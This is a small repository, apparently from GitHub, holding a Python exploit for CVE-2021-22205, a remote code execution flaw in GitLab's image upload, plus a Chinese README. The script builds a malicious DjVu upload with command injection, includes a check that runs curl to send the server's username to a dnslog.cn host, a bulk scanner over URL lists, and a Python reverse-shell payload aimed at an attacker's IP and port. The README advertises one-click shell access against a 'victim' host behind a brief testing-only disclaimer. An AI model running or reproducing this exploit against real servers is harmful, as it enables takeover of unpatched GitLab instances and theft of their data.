├── .gitignore ├── CVE-2021-22205.py └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /CVE-2021-22205.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | import base64 4 | import random 5 | import sys 6 | import os 7 | import argparse 8 | 9 | requests.packages.urllib3.disable_warnings() 10 | 11 | 12 | def banner(): 13 | print(""" 14 | ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____ 15 | / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___| 16 | | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 17 | | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) | 18 | \____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/ 19 | """) 20 | 21 | 22 | def check(target_url): 23 | session = requests.Session() 24 | try: 25 | req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) 26 | soup = BeautifulSoup(req1.text, features="lxml") 27 | token = soup.findAll('meta')[16].get("content") 28 | data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" 29 | headers = { 30 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 31 | "Connection": "close", 32 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", 33 | "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} 34 | flag = 'Failed to process image' 35 | req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) 36 | if flag in req2.text: 37 | print("[+] 目标 {} 存在漏洞".format(target_url)) 38 | else: 39 | print("[-] 目标 {} 不存在漏洞".format(target_url)) 40 | except Exception as e: 41 | print(e) 42 | 43 | 44 | def attack(target, command, shell=False, ip=None, port=-1): 45 | 46 | if shell: 47 | command = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((" \ 48 | f"\\\"{ip}\\\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno()," \ 49 | "2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);' " 50 | 51 | session = requests.Session() 52 | try: 53 | req1 = session.get(target.strip("/") + "/users/sign_in", verify=False) 54 | print(f"[+] 发送请求 {target}") 55 | soup = BeautifulSoup(req1.text, features="lxml") 56 | token = soup.findAll('meta')[16].get("content") 57 | data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{" + command + "} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" 58 | headers = { 59 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 " 60 | "Safari/537.36", 61 | "Connection": "close", 62 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", 63 | "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} 64 | flag = 'Failed to process image' 65 | req2 = session.post(target.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) 66 | if flag in req2.text: 67 | print("[+] 目标 {} 存在漏洞".format(target)) 68 | else: 69 | print("[-] 目标 {} 不存在漏洞".format(target)) 70 | except Exception as e: 71 | print(e) 72 | 73 | 74 | def scan(file): 75 | for url_link in open(file, 'r', encoding='utf-8'): 76 | if url_link.strip() != '': 77 | url_path = format_url(url_link.strip()) 78 | check(url_path) 79 | 80 | 81 | def format_url(url): 82 | try: 83 | if url[:4] != "http": 84 | url = "https://" + url 85 | url = url.strip() 86 | return url 87 | except Exception as e: 88 | print('URL 错误 {0}'.format(url)) 89 | 90 | 91 | if __name__ == '__main__': 92 | banner() 93 | parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') 94 | parser.add_argument('-t', '--target', dest='target', type=str, help='目标URL') 95 | parser.add_argument('-c', '--command', dest='command', type=str, help='执行命令') 96 | parser.add_argument('--shell', action='store_true', dest='shell', help='是否反弹shell') 97 | parser.add_argument('-i', '--ip', type=str, dest='ip', help='反弹shell ip') 98 | parser.add_argument('-p', '--port', type=int, dest='port', help='反弹shell端口') 99 | args = parser.parse_args() 100 | 101 | target = args.target 102 | command = args.command 103 | shell = args.shell 104 | ip = args.ip 105 | port = args.port 106 | attack(target, command, shell, ip, port) 107 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-22205 2 | 由于Gitlab未正确验证传递到文件解析器的图像文件从而导致命令执行。攻击者可构造恶意请求利用该漏洞在目标系统执行任意指令,最终导致Gitlab服务器被控制。由于网上大多缺少反弹shell,故修改了网上写的脚本,增加了一键getshell功能 3 | 4 | ## 影响版本 5 | * 11.9 <= GitLab(CE/EE)< 13.8.8 6 | * 13.9 <= GitLab(CE/EE)< 13.9.6 7 | * 13.10 <= GitLab(CE/EE)< 13.10.3 8 | 9 | ## 使用说明 10 | ```shell 11 | ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____ 12 | / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___| 13 | | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 14 | | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) | 15 | \____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/ 16 | 17 | usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP] 18 | [-p PORT] 19 | 20 | GitLab < 13.10.3 RCE 21 | 22 | optional arguments: 23 | -h, --help show this help message and exit 24 | -t TARGET, --target TARGET 25 | 目标URL 26 | -c COMMAND, --command COMMAND 27 | 执行命令 28 | --shell 是否反弹shell 29 | -i IP, --ip IP 反弹shell ip 30 | -p PORT, --port PORT 反弹shell端口 31 | ``` 32 | ## 使用 33 | ```shell 34 | python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell 35 | python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令 36 | ``` 37 | ## 声明 38 | 此脚本仅可用于测试使用,勿作他用 39 | --------------------------------------------------------------------------------